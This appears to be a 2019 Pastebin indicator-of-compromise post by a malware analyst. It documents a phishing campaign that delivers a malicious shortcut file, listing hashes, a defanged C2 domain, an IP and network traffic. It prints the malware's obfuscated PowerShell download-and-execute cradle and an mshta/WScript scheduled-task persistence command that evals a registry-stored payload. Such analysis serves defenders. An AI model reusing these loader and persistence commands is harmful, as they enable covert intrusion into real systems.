SHARE
TWEET

#ps_b64_070219

VRad Feb 7th, 2019 (edited) 570 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #LNK #powershell #fingerprinting #heavyobfuscated
  2.  
  3. https://pastebin.com/s6ymr2x5
  4.  
  5. attack_vector
  6. --------------
  7. email attach .lnk > powershell > get base64 > decode > fingerprint system
  8.  
  9. email_headers
  10. --------------
  11. n/a
  12.  
  13. files
  14. --------------
  15. SHA-256 18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460
  16. File name   КМУ база даних.zip  [Zip archive data, at least v2.0 to extract]
  17. File size   317.6 KB
  18.  
  19. SHA-256 3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b
  20. File name   sample.rtf.lnk      [MS Windows shortcut, Item id list present, Points to a file or directory]
  21. File size   3.08 KB
  22.  
  23. activity
  24. **************
  25. PL_SC   =   cdn1186{.} site/zG4roJ
  26.  
  27. C2      =   cdn1186{.} site/ua/news
  28.  
  29. netwrk
  30. --------------
  31. 88.85.86.229    cdn1186{.} site GET /zG4roJ HTTP/1.1    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  32.  
  33. 88.85.86.229    cdn1186{.} site POST /ua/news HTTP/1.1  noUA
  34.  
  35. comp
  36. --------------
  37. powershell.exe  1544    TCP 88.85.86.229    80  ESTABLISHED
  38.  
  39. proc
  40. --------------
  41. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  42. -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186{.} site/zG4roJ',$False);
  43. $cx.Send();$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')
  44.  
  45. C:\Windows\system32\schtasks.exe /create /tn FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0} /sc hourly /mo 2 /tr "MsHTa.EXe 'JaVAsCRIpT:var pata='efada'; var naxe='ifero'; var dhf=new ActiveXObject('\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c');
  46. var GJj=dhf.RegRead('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso');eval(GJj);close();' "
  47.  
  48. C:\Windows\system32\schtasks.exe /QUERY /FO CSV
  49. C:\Windows\system32\cmd.exe /c chcp 866 & SYSTEMINFO /FO CSV /NH 2>&1
  50. C:\Windows\system32\chcp.com
  51. C:\Windows\system32\systeminfo.exe  /FO CSV /NH
  52.  
  53. persist
  54. --------------
  55. Task Scheduler                 
  56. \FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0}
  57. Microsoft (R) HTML Application host
  58. Microsoft Corporation   c:\windows\syswow64\mshta.exe   14.10.2013 7:50
  59.  
  60. "MsHTa.EXe" "JaVAsCRIpT:var pata="efada"; var naxe="ifero";
  61. var dhf=new ActiveXObject("\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c");
  62. var GJj=dhf.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso");eval(GJj);close();"
  63.  
  64. drop
  65. --------------
  66. n/a
  67.  
  68. # # #
  69. https://www.virustotal.com/#/file/18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460/details
  70. https://www.virustotal.com/#/file/3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b/details
  71.  
  72. VR
  73.  
  74. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top